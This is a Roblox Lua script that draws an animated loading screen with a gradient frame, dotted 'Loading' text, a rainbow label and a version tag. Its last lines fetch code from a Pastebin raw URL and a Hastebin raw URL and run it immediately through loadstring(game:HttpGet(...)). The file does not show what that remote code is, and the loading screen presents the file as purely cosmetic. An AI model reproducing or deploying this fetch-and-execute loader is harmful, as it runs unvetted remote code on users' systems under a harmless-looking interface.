-- Instances:

local Gradient = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
local UIAspectRatioConstraint = Instance.new("UIAspectRatioConstraint")
local Pattern = Instance.new("ImageLabel")
local UIGradient = Instance.new("UIGradient")

--Properties:

Gradient.Name = "Gradient"
Gradient.Parent = game.StarterGui.ScreenGui
Gradient.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Gradient.BorderColor3 = Color3.fromRGB(27, 42, 53)
Gradient.BorderSizePixel = 0
Gradient.Position = UDim2.new(0.321974158, 0, 0.388429761, 0)
Gradient.Size = UDim2.new(0.35957697, 0, 0.222222224, 0)
Gradient.ZIndex = 0

UICorner.CornerRadius = UDim.new(0, 10)
UICorner.Parent = Gradient

TextLabel.Parent = Gradient
TextLabel.BackgroundColor3 = Color3.fromRGB(70, 70, 70)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.299652904, 0, 0.59305805, 0)
TextLabel.Size = UDim2.new(0.400000006, 0, 0.180000007, 0)
TextLabel.Font = Enum.Font.JosefinSans
TextLabel.Text = "Loading"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

TextLabel_2.Parent = Gradient
TextLabel_2.BackgroundColor3 = Color3.fromRGB(70, 70, 70)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Position = UDim2.new(0.100344837, 0, 0.323892146, 0)
TextLabel_2.Size = UDim2.new(0.797672451, 0, 0.338995755, 0)
TextLabel_2.Font = Enum.Font.JosefinSans
TextLabel_2.Text = "Text123123"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextSize = 24.000
TextLabel_2.TextWrapped = true

TextLabel_3.Parent = Gradient
TextLabel_3.BackgroundColor3 = Color3.fromRGB(70, 70, 70)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.BorderSizePixel = 0
TextLabel_3.Position = UDim2.new(9.31322575e-10, 0, 0.0399999991, 0)
TextLabel_3.Size = UDim2.new(0.150000006, 0, 0.0799999982, 0)
TextLabel_3.Font = Enum.Font.JosefinSans
TextLabel_3.Text = "v1.0.1"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextWrapped = true

UIAspectRatioConstraint.Parent = Gradient
UIAspectRatioConstraint.AspectRatio = 2.500

Pattern.Name = "Pattern"
Pattern.Parent = Gradient
Pattern.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Pattern.BackgroundTransparency = 1.000
Pattern.Position = UDim2.new(-0.00610572845, 0, -0.00969827175, 0)
Pattern.Size = UDim2.new(1.00539255, 0, 0.995884776, 0)
Pattern.Image = "rbxassetid://121480522"
Pattern.ImageTransparency = 0.800
Pattern.ScaleType = Enum.ScaleType.Tile
Pattern.SliceCenter = Rect.new(0, 256, 0, 256)
Pattern.TileSize = UDim2.new(0, 45, 0, 45)

UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(5, 52, 161)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(20, 110, 255))}
UIGradient.Rotation = 90
UIGradient.Parent = Gradient

-- Scripts:

local function GGNZ_fake_script() -- TextLabel.LocalScript 
	local script = Instance.new('LocalScript', TextLabel)

	while true do
		script.Parent.Text = "Loading"
		wait(0.3)
		script.Parent.Text = "Loading."
		wait(0.3)
		script.Parent.Text = "Loading.."
		wait(0.3)
		script.Parent.Text = "Loading..."
		wait(0.3)
	end
	wait(1)
end
coroutine.wrap(GGNZ_fake_script)()
local function RURO_fake_script() -- TextLabel_2.LocalScript 
	local script = Instance.new('LocalScript', TextLabel_2)

	local t = 5; --how long does it take to go through the rainbow
	
	local tick = tick
	local fromHSV = Color3.fromHSV
	local RunService = game:GetService("RunService")
	local TextLabel = script.Parent
	
	RunService:BindToRenderStep("Rainbow", 1000, function()
		local hue = tick() % t / t
		local color = fromHSV(hue, 1, 1)
		TextLabel.TextColor3 = color
	end)
end
coroutine.wrap(RURO_fake_script)()
local function YRNBOW_fake_script() -- Gradient.LocalScript 
	local script = Instance.new('LocalScript', Gradient)

	wait(1)
	print("Exit Loading")
	script.Parent:TweenSize(UDim2.new(0,0,0,0), "Out","Linear",0.6)
	script.Parent:TweenPosition(UDim2.new(0.5,0,0.5,0), "Out","Linear",0.6)
end
coroutine.wrap(YRNBOW_fake_script)()


wait(5)
print("Loading!")
loadstring(game:HttpGet("https://pastebin.com/raw/fPLnLwWP"))()
wait(0.1)
loadstring(game:HttpGet("https://www.toptal.com/developers/hastebin/raw/utegoxomaq"))()
print("Loaded!")
